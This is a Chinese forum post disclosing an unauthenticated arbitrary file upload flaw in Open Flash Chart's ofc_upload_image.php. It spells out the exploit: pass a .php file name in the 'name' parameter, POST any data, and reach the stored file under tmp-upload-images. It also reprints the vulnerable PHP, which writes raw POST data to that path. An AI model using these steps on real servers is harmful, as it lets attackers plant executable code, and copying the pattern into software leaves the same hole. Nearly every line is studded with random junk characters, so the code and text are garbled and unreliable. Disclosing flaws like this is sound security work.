POST 数据漏洞文件执行任意后缀文件保存
/ ~* T7 k" }& F* {* n) a( K- T/ ~ 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
8 X/ Z. c% ^8 `& P2 F
1 A3 p. L" K% `1 h; n4 X2 o% @利用:+ E0 l1 s+ U" x ]2 B, A7 W: q
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
{/ A4 D" q' [8 u" P9 @; i
4 i6 E. x1 G/ x3 q& IPost任意数据' c9 }- u/ r4 M* j1 x
保存位置http://localhost/chart/tmp-upload-images/hfy.php
# T; E: q1 J& Y- o. e; u: F
' Q$ B+ R# Z( L4 C2 Y5 _
0 x# x. M' P& ^) p" Y最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~/ j: A0 R8 N0 x8 d( l
8 ?0 h. u/ _" r: ]+ A0 {" m
<?php) a" X' ]- s$ ]1 [2 X9 E
" } V- [- w- b- ?9 r) W
//
, x4 v) l( [. H* V1 q/ U// In Open Flash Chart -> save_image debug mode, you
6 j1 f* }4 Z/ t$ G0 x// will see the 'echo' text in a new window.
/ H- R$ y; }% v% F S* _1 t% c p) N) {//3 p: s8 {8 D) ~% v& J
X% U/ T! u$ l; l4 f" d3 t- A% P/*
2 D& \1 `& F0 ^2 U; I- V, G6 d
" f2 x' t* |! M+ `print_r( $_GET );
& e8 l3 ^" U3 tprint_r( $_POST );
7 S) x+ `5 V6 pprint_r( $_FILES );
- d8 {; `7 H- c3 C7 S1 i G
% h! i( t6 f+ H1 y( qprint_r( $GLOBALS );
, B9 n7 ]9 b5 O9 }/ d% p& E& [6 @. Cprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
2 x9 s& h$ C" X1 |: ]! ]9 y
, n* I5 D* u" g# q4 S; \5 M*/
: M' ~1 f* f$ o// default path for the image to be stored //" k0 b& ]0 V5 c2 G* d% f
$default_path = '../tmp-upload-images/'; ^: y: R) B: G9 p1 D N& R% F' e
) `0 ~, s5 @6 {* qif (!file_exists($default_path)) mkdir($default_path, 0777, true);
2 x) |- y: ^0 ` ~" V, C2 ^0 P x0 `
// full path to the saved image including filename //
) s5 y% O! s" X. C4 o( v5 E) i) o, k$destination = $default_path . basename( $_GET[ 'name' ] ); ' B* z2 z; _' j. [3 N
$ E y) k- h l6 J+ f. j
echo 'Saving your image to: '. $destination;9 A# @, p* f4 Y5 ?4 A8 e3 j
// print_r( $_POST );
9 [# g/ k5 v" r// print_r( $_SERVER );6 Y& Q! @/ `8 g, P
// echo $HTTP_RAW_POST_DATA;3 \0 p+ Z0 n. U
4 f- E& c1 ] d0 W: F& r$ R
//$ l( p( t+ `) N2 a
// POST data is usually string data, but we are passing a RAW .png
& u% R5 f0 F, d9 G# ~8 U$ q! ^5 A// so PHP is a bit confused and $_POST is empty. But it has saved8 z: I# j" c) X$ ^) x# _
// the raw bits into $HTTP_RAW_POST_DATA
+ r4 g8 q. {# E( d//
8 d6 A$ O( Q; s8 }% N$ z$ o" }9 v4 z: ~ P3 C6 x' ]# D
$jfh = fopen($destination, 'w') or die("can't open file");
7 f8 A! v# @' f$ J4 a, `$ ^fwrite($jfh, $HTTP_RAW_POST_DATA);
0 |6 D- Q; Z; r& _5 J d% xfclose($jfh);$ L/ k, l. ]8 q: P
- o+ w0 s1 z2 A+ N4 q
//
% Q: J9 r( M2 s8 V! v& [* B/ f// LOOK:
) H9 N) ~! h T" x, L; E//, o% F% i1 z7 H* T
exit();
# \* q2 S+ u- m8 O/// C+ |% a0 c/ e/ e3 a% N9 U9 p
// PHP5:
: H3 v8 Y- a+ b3 T7 n: F! ~% E! q//) W- ?. m' G& ]# t& e
/ \4 X' r8 F% U# R; K8 D, R# F
' g \- ^: |' |$ d/ ]- y// default path for the image to be stored //
& E& q( x2 f; k, Z$ L; w0 P$default_path = 'tmp-upload-images/';- H+ w3 L' h$ T+ J* F9 N- n o
+ x) i' l8 O6 f& \; D- lif (!file_exists($default_path)) mkdir($default_path, 0777, true);
4 |3 T Z- ~( B& A& g
4 `& f- v! `, i; o. l8 f8 P// full path to the saved image including filename //
) k( F6 x; v$ d2 y' x8 c$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
+ c, b* s4 M: {# P* Z# o/ i- {9 b/ \6 Q9 N( I, T
// move the image into the specified directory //
! k6 ]6 Q% K/ E, c2 a1 Y8 N4 x8 Oif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
3 J9 a* v8 M$ k echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";5 l! u$ Q6 f/ v; U1 E/ a
} else {3 ]* w M% b8 u# P# j1 ~( z
echo "FILE UPLOAD FAILED";+ z. x+ |% n+ b- Q
}/ _$ M; {0 d' e8 N7 W2 u
; f/ i z$ `! T% z5 R! t
( r# M8 w- i. R. V0 V8 i/ @ L1 B?>' @2 x* g' S& u3 h7 n6 r3 u
) ^' I* X% i1 ]7 u2 j, ?! Z
f/ r6 t# V2 ?" n1 p6 m
; Z( |; ^* L8 N5 Q
0 j" y* h# d6 \+ ]! g
' a5 a" j$ q* X4 G3 v8 v G
3 x. e8 ?8 B: i1 o修复方案:
; J2 X' S/ C \这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
' h2 k- \8 |$ L$ h) U4 O$ A2 j/ A8 M7 O
U6 z$ t: b2 v4 v* V- Z1 O/ b G2 N7 p) ~
4 z; ?- }1 Q# X* L7 w
|
发表于 2013-2-23 12:38:58
收藏
支持
反对